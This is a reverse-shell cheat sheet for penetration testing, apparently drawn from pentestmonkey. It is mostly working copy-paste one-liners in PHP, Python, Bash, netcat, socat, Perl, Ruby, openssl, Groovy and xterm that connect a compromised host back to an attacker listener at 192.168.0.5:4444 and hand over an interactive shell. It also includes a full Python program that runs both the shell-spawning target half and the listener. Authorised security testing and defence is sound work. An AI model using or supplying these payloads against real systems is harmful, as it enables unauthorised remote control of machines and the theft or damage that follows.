If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.
If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either throwing back a reverse shell or binding a shell to a TCP port. This page deals with the former.
Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.
The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you substitute “cmd.exe” for “/bin/sh -i”.
Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they’re quite short lines, but not very readable.
PHP (assumes the socket ends up on file descriptor 3, which is what a fresh php -r process normally gives you; if the shell doesn’t come back, try 4, 5 or 6):
php -r '$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Python (works under both Python 2 and 3):
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Bash (must actually be run by bash: /dev/tcp is a bash feature and is not available under dash or another minimal /bin/sh; listener is 192.168.0.5:4444, as in the other examples):
bash -i >& /dev/tcp/192.168.0.5/4444 0>&1
Netcat (only with builds that support -e, such as nc.traditional or ncat; the OpenBSD netcat shipped by many distributions deliberately omits it. If -e is missing, use the mkfifo pipe from the openssl example below with nc in place of openssl s_client):
nc -e /bin/sh 192.168.0.5 4444
Socat:
socat tcp-connect:192.168.0.5:4444 system:/bin/sh
Perl (listener is 192.168.0.5:4444, as in the other examples):
perl -e 'use Socket;$i="192.168.0.5";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby:
ruby -rsocket -e'f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
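All of the one-liners above show only the target side; on your machine you still need something listening on 192.168.0.5:4444 (a plain netcat listener such as nc -lvnp 4444 is the usual choice). The following is an added example, not code from pentestmonkey’s cheat sheet, that runs both halves of the Python variant on the loopback interface so you can see the whole exchange: the target half uses the one-liner’s os.dup2-onto-0/1/2 trick inside a forked child, and the attacker half stands in for the netcat listener, feeds it commands and collects whatever the shell sends back. It assumes a POSIX /bin/sh and that fork and loopback sockets are permitted; 127.0.0.1 and an ephemeral port replace the page’s 192.168.0.5:4444.

```python
import os
import signal
import socket

# Assumption: a POSIX shell at this path, as on the targets the page has in mind.
SHELL = "/bin/sh"


def spawn_reverse_shell(host, port):
    """Target side, the same trick as the page's Python one-liner: connect back,
    dup the socket onto fds 0/1/2 and exec an interactive shell. It runs in a
    forked child so that the caller keeps its own stdin/stdout/stderr.
    Returns the child's pid."""
    pid = os.fork()
    if pid != 0:
        return pid
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        for fd in (0, 1, 2):
            os.dup2(s.fileno(), fd)   # dup2 clears close-on-exec on the new fds
        os.execv(SHELL, [SHELL, "-i"])
    except Exception:
        pass
    os._exit(1)   # only reached if connect() or exec() failed


def catch_shell(listener, commands, timeout=15.0):
    """Attacker side, standing in for the listener the page leaves out
    (e.g. nc -lvnp 4444): accept one connection, send the commands, and
    return everything the shell wrote back until it exits and the socket
    closes."""
    listener.settimeout(timeout)
    conn, _ = listener.accept()
    conn.settimeout(timeout)
    try:
        for cmd in commands:
            conn.sendall((cmd + "\n").encode())
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    finally:
        conn.close()
    return b"".join(chunks).decode(errors="replace")


def demo(commands=("echo reverse shell ok", "exit")):
    """Run both halves on the loopback interface (127.0.0.1 and an ephemeral
    port stand in for the 192.168.0.5:4444 used on the page)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    host, port = listener.getsockname()
    pid = spawn_reverse_shell(host, port)
    try:
        return catch_shell(listener, list(commands))
    finally:
        listener.close()
        try:
            os.kill(pid, signal.SIGKILL)   # no-op if the shell already exited
        except ProcessLookupError:
            pass
        os.waitpid(pid, 0)   # reap the shell


if __name__ == "__main__":
    print(demo())
```

Because the shell’s stderr is also dup’d onto the socket, the captured text includes the "$ " prompts and the "can’t access tty; job control turned off" style warning you see in a real reverse shell, which is exactly why the output looks noisier than running the same commands locally.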
TLS-encrypted shell using openssl. On your machine (the listener; this is a TLS session rather than a plain TCP connection, so a netcat listener will not catch it):
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes # generate some arbitrary cert
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
On the compromised target:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.0.5:4444 > /tmp/s; rm /tmp/s
Java (the [...] as String[] cast is Groovy syntax; note there is no interactive shell here: the loop reads one command per line from the socket and runs it, so nothing prompts you and each command must be self-contained):
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.5/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm (the display number selects the TCP port: display :1 is port 6001, so you need an X server listening on that display on your machine, and the target must be allowed to connect to it, e.g. via xhost):
xterm -display 192.168.0.5:1
Source: Reverse Shell Cheat Sheet, http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet